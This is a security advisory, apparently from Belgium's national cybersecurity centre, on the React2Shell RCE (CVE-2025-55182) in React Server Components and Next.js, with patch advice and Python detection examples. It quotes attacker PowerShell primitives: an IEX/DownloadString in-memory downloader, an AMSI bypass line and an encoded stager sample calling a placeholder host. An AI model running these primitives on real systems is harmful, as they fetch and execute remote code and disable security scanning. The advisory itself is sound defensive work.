Warning: Critical vulnerability in React Server Components can lead to unauthenticated remote code execution (RCE), Patch Immediately!

Published: 04/12/2025
  • Last update: 07/12/2025
  • Affected software:
    → React Server Components versions 19.0, 19.1.0, 19.1.1 and 19.2.0
    → Next.js
  • Type: Remote Code Execution
  • CVE/CVSS
    → CVE-2025-55182: CVSS 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
    → CVE-2025-66478: CVSS 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Sources

React advisory - https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Next.js advisory - https://nextjs.org/blog/CVE-2025-66478
Detection surface scanner - https://github.com/fatguru/CVE-2025-55182-scanner
Greynoise - https://www.greynoise.io/blog/cve-2025-55182-react2shell-opportunistic-exploitation-in-the-wild-what-the-greynoise-observation-grid-is-seeing-so-far

Risks

In December 2025, React published an advisory regarding an unauthenticated remote code execution vulnerability affecting React Server Components, related packages, and downstream technology.

CVE-2025-55182, widely known as "React2Shell", is actively exploited. Threat actors will likely keep attempting to weaponize CVE-2025-55182, as apps are vulnerable even if they support but do not use React Server Components. The significant downstream impact of this vulnerability makes it attractive to threat actors, as this technology is widely used across numerous web applications.

Immediate action required. Failure to immediately apply vendor-supplied patches makes the system a high-value target for threat actors, potentially resulting in full system compromise, data exfiltration, credential theft, or the staging of ransomware or botnet deployment. This vulnerability represents a direct and severe business risk to the confidentiality, integrity, and availability of affected production systems.

Description

CVE-2025-55182 is a flaw in the way React decodes payloads sent to React Server Function endpoints. An unauthenticated attacker could craft a malicious HTTP request to any Server Function endpoint that, when deserialized by React, achieves remote code execution on the server.

The vulnerability is present in specific versions (19.0, 19.1.0, 19.1.1 and 19.2.0) as well as in three packages:

  • react-server-dom-webpack
  • react-server-dom-parcel
  • react-server-dom-turbopack

Note that even if an app does not implement any React Server Function endpoints, it may still be vulnerable as long as the app supports React Server Components. In other words, there is a significant downstream impact: an app is vulnerable if it uses a framework, bundler or bundler plugin that supports React Server Components.

Next.js introduced another CVE identifier – CVE-2025-66478 – for the same vulnerability in order to track downstream impacts.

Observed exploitation follows a standard, high-throughput, automated attack chain:

  • Initial Access & Proof-of-Execution (PoE): Automated scanners utilize publicly available Proof-of-Concept (PoC) code. They first validate successful RCE using "cheap math" PowerShell probes, such as powershell -c "40138*41979". This technique confirms execution capability with minimal endpoint artifacts.
  • Payload Staging: Upon confirmation, attackers deploy encoded PowerShell stagers, typically in the powershell -enc form. This executes an in-memory downloader via primitives such as IEX (New-Object System.Net.Webclient).DownloadString(...).
  • Defense Evasion: The second-stage payload often attempts to bypass host-based security tools by using reflection to set the AMSI bypass primitive: System.Management.Automation.AmsiUtils.amsiInitFailed = $true.
  • Final Objective: The compromised system is then used for various commodity post-exploitation activities.

Recommended Actions

Patch
The Centre for Cybersecurity Belgium strongly recommends installing updates for vulnerable devices with the highest priority after thorough testing.

React indicates in their advisory that patching depends on the software used. Read the advisory to verify which version to upgrade – or in certain cases, to downgrade – to: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
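To inventory which deployments carry the listed versions before patching, here is an added example (not CCB's, React's or Next.js's code) that walks the output of npm ls --all --json, or a package-lock.json, and flags the three react-server-dom-* packages at the versions named in this advisory. It assumes the version list applies to those three packages, accepts npm's 19.0.0 spelling of 19.0, and uses constructed sample input; it reports listed versions only and does not decide which version to upgrade or downgrade to.

```python
import json

# Packages and versions as listed in the CCB advisory. The advisory writes "19.0"; npm reports that
# release as 19.0.0, so both spellings are accepted (assumption). Only listed versions are flagged:
# a version absent from this set is not thereby known to be fixed.
AFFECTED_PACKAGES = {"react-server-dom-webpack", "react-server-dom-parcel", "react-server-dom-turbopack"}
AFFECTED_VERSIONS = {"19.0", "19.0.0", "19.1.0", "19.1.1", "19.2.0"}

def walk_npm_ls(node, path=()):
    """Yield (path, name, version) for every node of `npm ls --all --json` output, nested deps included."""
    for name, info in (node.get("dependencies") or {}).items():
        here = path + (name,)
        yield here, name, info.get("version", "")
        yield from walk_npm_ls(info, here)

def affected_from_npm_ls(tree):
    """Dependency paths where one of the RSC packages sits at a listed vulnerable version."""
    return sorted("/".join(p) + "@" + v for p, n, v in walk_npm_ls(tree)
                  if n in AFFECTED_PACKAGES and v in AFFECTED_VERSIONS)

def affected_from_lockfile(lock):
    """Same check over package-lock.json (lockfileVersion 2/3), whose keys end in node_modules/<name>."""
    hits = []
    for key, info in lock.get("packages", {}).items():
        name = key.rsplit("node_modules/", 1)[-1]
        if name in AFFECTED_PACKAGES and info.get("version") in AFFECTED_VERSIONS:
            hits.append(key + "@" + info["version"])
    return sorted(hits)

# Constructed sample inputs (not real project output); "-placeholder" versions stand in for
# values the advisory does not give.
SAMPLE_NPM_LS = json.loads("""{
  "name": "shop-frontend", "version": "1.0.0",
  "dependencies": {
    "next": {"version": "15.0.0-placeholder",
             "dependencies": {"react-server-dom-webpack": {"version": "19.2.0"}}},
    "react-server-dom-turbopack": {"version": "19.9.9-placeholder"}
  }}""")
SAMPLE_LOCK = {"lockfileVersion": 3, "packages": {
    "": {"name": "shop-frontend", "version": "1.0.0"},
    "node_modules/react-server-dom-parcel": {"version": "19.1.1"},
    "node_modules/next": {"version": "15.0.0-placeholder"},
    "node_modules/next/node_modules/react-server-dom-webpack": {"version": "19.2.0"},
}}

if __name__ == "__main__":  # usage: npm ls --all --json | python3 rsc_versions.py
    import sys
    print("\n".join(affected_from_npm_ls(json.load(sys.stdin))) or "no listed versions found")
```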

Mitigate

  • Network Perimeter Defense: Deploy real-time threat intelligence-sourced blocklists to prevent opportunistic IP addresses from compromising your perimeter. This measure can immediately reduce exposure to mass-scanning and automated attacks associated with this vulnerability.
  • Principle of Least Privilege: Ensure that the processes running React Server Components operate with the minimum necessary privileges to reduce the potential impact of successful RCE.

Monitor/Detect
The CCB recommends organizations upscale monitoring and detection capabilities to identify any related suspicious activity and ensure a swift response in case of an intrusion.

A Python tool was created to detect React Server Components endpoints that may be exposed to CVE-2025-55182 (https://github.com/fatguru/CVE-2025-55182-scanner). Please note that this tool was not tested by the CCB.

GreyNoise analysed the automated attack patterns and added extra recommended actions to their blog: https://www.greynoise.io/blog/cve-2025-55182-react2shell-opportunistic-exploitation-in-the-wild-what-the-greynoise-observation-grid-is-seeing-so-far

Endpoint Detection (PowerShell): Monitor and alert on high-signal, low-regret PowerShell command-line primitives:

  • Alert on any execution of powershell.exe or pwsh.exe whose command line contains -enc or -EncodedCommand AND either DownloadString( or IEX.
  • Alert on any script block (Windows Event ID 4104) containing any two of the AMSI bypass components: System.Management.Automation.AmsiUtils, amsiInitFailed, GetField, NonPublic,Static, or SetValue.
  • Aggregate detection on repeated powershell -c "*" across a short window, as this is a strong indicator of exploit validation.
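The three endpoint rules above, as an added example (not CCB's or GreyNoise's tooling) in Python over constructed process and Script Block (Event ID 4104) records. The 60-second window and three-probe threshold are assumptions, and the first rule also decodes the -enc argument (base64 of a UTF-16LE script) so that a stager that only appears inside the encoded command is still caught.

```python
import base64
import re
from collections import defaultdict

# Rules transcribed from the advisory's endpoint guidance; WINDOW_SEC and PROBE_MIN are assumptions.
AMSI_PARTS = ("System.Management.Automation.AmsiUtils", "amsiInitFailed",
              "GetField", "NonPublic,Static", "SetValue")
PS_IMAGE = re.compile(r"(?i)\b(?:powershell|pwsh)(?:\.exe)?\b")
ENC_ARG = re.compile(r"(?i)(?:^|\s)-(?:enc|encodedcommand)\s+(\S+)")
STAGER = re.compile(r"(?i)DownloadString\(|\bIEX\b")
MATH_PROBE = re.compile(r'(?i)\bpowershell(?:\.exe)?\s+-c\s+"[^"]*"')
WINDOW_SEC, PROBE_MIN = 60, 3

def decode_enc(cmdline):
    """-enc/-EncodedCommand carries base64 of a UTF-16LE script; '' if absent or undecodable."""
    m = ENC_ARG.search(cmdline)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else ""
    except (ValueError, UnicodeDecodeError):
        return ""

def encoded_stager(cmdline):
    """Rule 1: powershell/pwsh + -enc|-EncodedCommand + DownloadString( or IEX (raw or decoded)."""
    return bool(PS_IMAGE.search(cmdline) and ENC_ARG.search(cmdline)
                and STAGER.search(cmdline + "\n" + decode_enc(cmdline)))

def amsi_tamper(script_block):
    """Rule 2 (Event ID 4104): any two of the AMSI bypass components; returns the matches."""
    hits = [p for p in AMSI_PARTS if p in script_block]
    return hits if len(hits) >= 2 else []

def probe_bursts(events):
    """Rule 3: hosts with PROBE_MIN or more `powershell -c "*"` runs within WINDOW_SEC."""
    per_host = defaultdict(list)
    for ts, host, kind, text in sorted(events):  # time-ordered, so per-host lists are sorted
        if kind == "process" and MATH_PROBE.search(text):
            per_host[host].append(ts)
    return sorted(h for h, t in per_host.items() if any(
        t[i + PROBE_MIN - 1] - t[i] <= WINDOW_SEC for i in range(len(t) - PROBE_MIN + 1)))

_B64 = base64.b64encode("IEX (New-Object System.Net.Webclient).DownloadString('http://example.invalid/s')"
                        .encode("utf-16-le")).decode()  # constructed stager text, not a real capture
SAMPLE_EVENTS = [  # constructed (epoch_seconds, host, 'process'|'4104', text) records, not real logs
    (100, "web01", "process", 'powershell -c "40138*41979"'),
    (110, "web01", "process", 'powershell -c "12345*6789"'),
    (130, "web01", "process", 'powershell.exe -c "222*333"'),
    (140, "web01", "process", "powershell.exe -nop -w hidden -enc " + _B64),
    (150, "web01", "4104", "$t = 'System.Management.Automation.AmsiUtils'; $f = 'amsiInitFailed'"),
    (900, "web02", "process", "pwsh -enc QQBCAA== -NoProfile"),  # decodes to 'AB': no stager
]
```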

Network Detection (Traffic Composition): Since this activity is overwhelmingly automation-heavy, defenders should look for network patterns consistent with scanners and botnets:

  • User-Agents: Monitor HTTP requests for highly specific or automation-heavy User-Agents, such as Go-http-client/1.1, those containing Assetnote/1.0.0, or aiohttp and python-requests.

  • Infrastructure: Block or alert on traffic originating from infrastructure known to be associated with opportunistic exploitation, including newly observed IP addresses and known VPS/proxy pool ranges that are exhibiting rapid churn.

  • Fingerprinting: Utilize network fingerprinting (e.g., JA4T/JA4H) to detect highly concentrated traffic clusters associated with the exploitation attempts. Specifically, monitor for the top observed pairs:

    - 42340_2-4-8-1-3_1460_11 + po11nn060000_3865ae1cc1d9_...
    - 64240_2-1-3-1-1-4_1400_8 + po10nn090000_75eeec6218a0_...
    - 42340_2-4-8-1-3_1460_11 + po11nn10enus_38148d6b7d75_...
    - 42340_2-4-8-1-3_1460_10 + po11nn090000_3343762cd6d7_...
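The User-Agent and fingerprint checks above, as an added example (not CCB's or GreyNoise's tooling) over constructed JSON-lines access records that carry JA4T and JA4H values. Because the advisory lists the JA4H values truncated, the pairs are matched by prefix, and the 50% concentration threshold is an assumption.

```python
import json
from collections import Counter

# Markers and fingerprint pairs as listed in the advisory. The advisory truncates the JA4H values,
# so pairs are matched by prefix. CONCENTRATION is an assumed threshold.
UA_MARKERS = ("Go-http-client/1.1", "Assetnote/1.0.0", "aiohttp", "python-requests")
OBSERVED_PAIRS = (
    ("42340_2-4-8-1-3_1460_11", "po11nn060000_3865ae1cc1d9_"),
    ("64240_2-1-3-1-1-4_1400_8", "po10nn090000_75eeec6218a0_"),
    ("42340_2-4-8-1-3_1460_11", "po11nn10enus_38148d6b7d75_"),
    ("42340_2-4-8-1-3_1460_10", "po11nn090000_3343762cd6d7_"),
)
CONCENTRATION = 0.5

def automation_ua(ua):
    """True when the User-Agent carries one of the advisory's automation markers."""
    return any(m in ua for m in UA_MARKERS)

def known_pair(ja4t, ja4h):
    """True when (JA4T, JA4H) matches an advisory pair; JA4H is compared by its listed prefix."""
    return any(ja4t == t and ja4h.startswith(h) for t, h in OBSERVED_PAIRS)

def analyse(log_lines):
    """JSON-lines records {src, ua, ja4t, ja4h} -> sources and fingerprint clusters to review."""
    recs = [json.loads(line) for line in log_lines if line.strip()]
    pairs = Counter((r["ja4t"], r["ja4h"]) for r in recs)
    total = max(len(recs), 1)
    return {
        "automation_ua": sorted({r["src"] for r in recs if automation_ua(r["ua"])}),
        "known_pair": sorted({r["src"] for r in recs if known_pair(r["ja4t"], r["ja4h"])}),
        "concentrated": sorted(p for p, n in pairs.items() if n / total >= CONCENTRATION),
    }

# Constructed sample records (not real traffic); the 12-hex JA4H suffixes are made up.
SAMPLE_LOG = """
{"src": "198.51.100.7", "ua": "Go-http-client/1.1", "ja4t": "42340_2-4-8-1-3_1460_11", "ja4h": "po11nn060000_3865ae1cc1d9_000000000000_000000000000"}
{"src": "198.51.100.7", "ua": "Go-http-client/1.1", "ja4t": "42340_2-4-8-1-3_1460_11", "ja4h": "po11nn060000_3865ae1cc1d9_000000000000_000000000000"}
{"src": "203.0.113.9", "ua": "Mozilla/5.0 (constructed browser UA)", "ja4t": "64240_2-1-3-1-1-4_1400_8", "ja4h": "po10nn090000_ffffffffffff_000000000000_000000000000"}
{"src": "192.0.2.44", "ua": "python-requests/2.31.0", "ja4t": "42340_2-4-8-1-3_1460_11", "ja4h": "po11nn060000_3865ae1cc1d9_000000000000_000000000000"}
""".splitlines()
```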

In case of an intrusion, you can report an incident via https://ccb.belgium.be/en/cert/report-incident.

While patching appliances or software to the newest version may protect against future exploitation, it does not remediate historic compromise.

References

Cyber Security News article - https://cybersecuritynews.com/scanner-tool-reactjs-and-next-js/
Vercel advisory - https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp
Amazon AWS (exploitation reference) - https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/